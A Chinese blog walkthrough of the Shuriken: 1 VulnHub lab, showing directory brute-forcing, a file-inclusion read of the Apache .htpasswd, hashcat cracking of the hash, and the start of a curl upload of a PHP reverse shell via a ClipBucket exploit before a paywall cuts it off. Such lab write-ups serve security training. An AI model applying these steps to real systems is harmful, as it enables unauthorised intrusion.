Shuriken: 1 vulnhub walkthrough

最新推荐文章于 2024-04-17 21:09:50 发布
最新推荐文章于 2024-04-17 21:09:50 发布
阅读量1.1k 收藏
点赞数 3
分类专栏: vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xdeclearn/article/details/110528729
版权

Shuriken: 1

vulnhub地址:http://www.vulnhub.com/entry/shuriken-1,600/

0x01 信息收集到获取shell

服务器只开放了80端口,dirb爬取目录。

==> DIRECTORY: http://192.168.56.121/css/                                      
==> DIRECTORY: http://192.168.56.121/img/                                      
+ http://192.168.56.121/index.php (CODE:200|SIZE:6021)                        
==> DIRECTORY: http://192.168.56.121/js/                                       
==> DIRECTORY: http://192.168.56.121/secret/

最初以为secret目录下secret.png图片做了信息隐藏,一顿操作没有找到任何信息。反过来查看index.php页面的js,发现了有意思的东西。

hint修改hosts后访问http://broadcast.shuriken.local,发现需要basic auth

basic于是尝试另一个请求http://shuriken.local/index.php?referer=,读取到了apache2的默认配置文件/etc/apache2/sites-enabled/000-default.conf

auth
继续读/etc/apach2/.htpasswd,得到了用户名和加密密码developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0

用hashcat结合rockyou字典破解密码为9972761drmfsls

kali@kali:~$ hashcat -m 1600 -a 0 1.txt /usr/share/wordlists/rockyou.txt --show
$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0:9972761drmfsls

进入系统,发现是clipbucket4.0。

clibucket
在exploit-db上搜到一个利用:https://www.exploit-db.com/exploits/44250,成功上传shell。

kali@kali:~$ curl --basic --user "developers:9972761drmfsls" -F "file=@php_reverse_shell.php" -F "plupload=1" -F 
最低0.47元/天 解锁文章
xdeclearn
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【精选】VulnHub Shuriken-1 (超详细过程思路)
人若无名,便可专心练剑
12-01 82
secret.png 的图片文字是 javascript,作者提示我们应该与 javascript 代码有关,仔细看首页 index.php 中有两个js代码。访问broadcast.shuriken.local,弹出用户登录框。由于http basic认证,用户名密码为保存在。试着想直接看看能不能访问到,发现域名解析失败,所有直接把域名加入到。靶机IP地址是:192.168.3.130。添加完成之后,访问域名,发现需要登录。开放了80、8080端口。文件中,文件和位置保存在。
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7040
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
Shuriken-1靶机总结
qq_45301512的博客
12-17 267
Shuriken-1虚拟机设为NAT模式后,打开虚拟机,通过nmap扫描出其ip和端口通过开放的80端口,打开网站信息收集,发现js文件存在两个链接尝试去打开链接,发现了一个存在文件包含的地方Broadcas.shuriken.local无法直接打开,需要加到hosts文件中打开网站后发现需要登录尝试通过文件包含读取apache2的配置文件,发现了存放密码的路径,紧接着去读取密码读取到了密码apr1apr1apr1接下来就是对密码的破解。
vulnhub之靶机技术栈
li1136594919的博客
08-08 167
靶机名 getshell 提权 备注 symfonos4 sql注入+文件包含 python序列化与反序列化 VPLE 集成练习靶场 CSRF-Minefield-V1.0 CSRF专项练习靶机
SHURIKEN: NODE 靶机渗透测试
最新发布
weixin_62035484的博客
04-17 834
观察到有 passwd.bak 和 shadow.bak 以及 ssh-backup.zip,但passwd.bak和shadow.bak无法打开,将 ssh-backup.zip 复制到 /tmp 目录中,并发送给kali。保存,然后停止shuriken-auto.timer再执行shuriken-auto.timer,sudoers就可以被直接编辑,这是一个静态的页面,有一个登录的入口,除此之外没别的信息了,其他的网页扫描工具也扫不出来什么东西。192.168.56.x是我的虚拟机所在的网段。
[Vulnhub]node
cosmoslin的博客
09-16 5066
渗透测试过程记录 测试人员:cosmos 目标地址:192.168.131.132:3000 目标账号:未知 目标主机:未知 测试记录 前期信息搜集阶段略 打开192.168.131.132:3000 利用网站的黑盒测试做信息搜集 http://192.168.131.132:3000/ http://192.168.131.132:3000/login http://192.168.131.132:3000/profiles/tom http://192.168.131.132:3000/profil
Unity中的Shuriken粒子系统(1)
weixin_43332204的博客
06-27 779
unity 3d 的Shuriken粒子系统 1.打开unity 3d,新建一个工程文件,可取名为ShurikenParticleSystemProject。 2.在Project下新建一个文件夹,可取名为Scenes,并将场景进行保存到文件夹中,可保存为main。 3.创建粒子系统的三种方式: 方式一: 方式二: 方式三:由于没有材质,得到的特效是紫色的 4.这里采用了方式一创建粒...
Vulnhub Node:1 详解
StriveBen的博客
09-03 1280
文章首发:https://xz.aliyun.com/t/2695 欢迎进群交流技术: 363034250 信息收集 arp-scan 用来发现系统和指纹识别的命令行工具。 从结果中可以看到node的ip是”192.168.92.129” 使用nmap对端口进行探测,如下图所示: 可知开放的端口有2个,分别是:22和3000,其中3000是个web服务; 详细banner信息...
super-shuriken:忍者的手里剑投掷游戏
05-20
超级手里剑忍者的手里剑投掷游戏。
shuriken:手里剑是一个简单的分布式任务执行器
05-01
无业游民-1.xx或2.xx 跑步 vagrant up vagrant ssh cd /vagrant # After that, you are ready to go. make queue # Run a Rabbitmq if you don't have. You can edit endpoints in config file if you have. make ...
shuriken:Shuriken 是一个监控代理,它允许对 Shinken 监控系统进行被动检查 vie mod-ws-arbiter
07-11
手里剑 Shuriken 是一个监控代理,它允许通过 mod-ws-arbiter 对 Shinken 监控系统进行被动检查。 有关更多信息,请参阅要求Python == 2.7.8 请求 == 2.4.3描述到这里
shuriken.unitypackage
12-14
shuriken小游戏的资源包,资源包里有代码,图片等所需的资源,而且打开Unity3d导入资源即可观看游戏效果。
Shuriken Salvo v1.02.txt
04-07
unity中的一款资源包,提供了飞镖特效Shuriken Salvo 1.04, 忍术粒子超强特效包。
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 2877
Vulnhub靶机渗透学习——DC-9
VulnHub】【2023年07月18日】最新全部靶场详情(上)
惟忆
07-18 8153
【代码】【VulnHub】【2023年07月18日】最新全部靶场详情(上)
靶机渗透练习90-Grotesque:1.0.1
hirak0的博客
05-02 2780
靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
SECARMY VILLAGE: GRAYHAT CONFERENCE vulnhub walkthrough
xdeclearn的博客
11-14 1752
SECARMY VILLAGE: GRAYHAT CONFERENCE 虚拟机地址:https://download.vulnhub.com/secarmyvillage/SECARMY-VILLAGE-OSCP-GIVEAWAY.ova 主机探测、端口扫描这里就省略了,每次都写显得冗余了。 flag1 访问80端口,没有什么有价值信息,先dirb跑一下目录 ---- Scanning URL: http://192.168.132.141/ ---- ==> DIRECTORY: http://19
shuriken salvo 1.04
07-28
shuriken salvo 1.04是一个游戏中的技能或武器。在游戏中,玩家可以使用shuriken salvo 1.04作为一种攻击手段来对敌人造成伤害。这个技能可能是一个忍者或武士角色使用的,因为“shuriken”是指忍者所使用的手里剑,而“salvo”则表示大规模的攻击或射击。 shuriken salvo 1.04可能有以下特点: 1. 多重投射:shuriken salvo 1.04可能会一次性射出多个手里剑,从而同时攻击多个敌人。这种特点可以在面对多个敌人时提高玩家的攻击效率。 2. 高伤害:由于shuriken salvo 1.04是一个技能或武器,因此它可能会给敌人造成较高的伤害。这可能是因为手里剑的锋利和快速的发射速度。 3. 可能有冷却时间:为了平衡游戏,shuriken salvo 1.04可能具有冷却时间,意味着在使用后需要一段时间来重新充能,玩家不能无限次使用该技能。 总的来说,shuriken salvo 1.04是一种在游戏中使用的技能或武器,具备多重投射、高伤害和冷却时间的特点。玩家可以利用这个技能来有效地攻击敌人,并且在战斗中取得优势。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值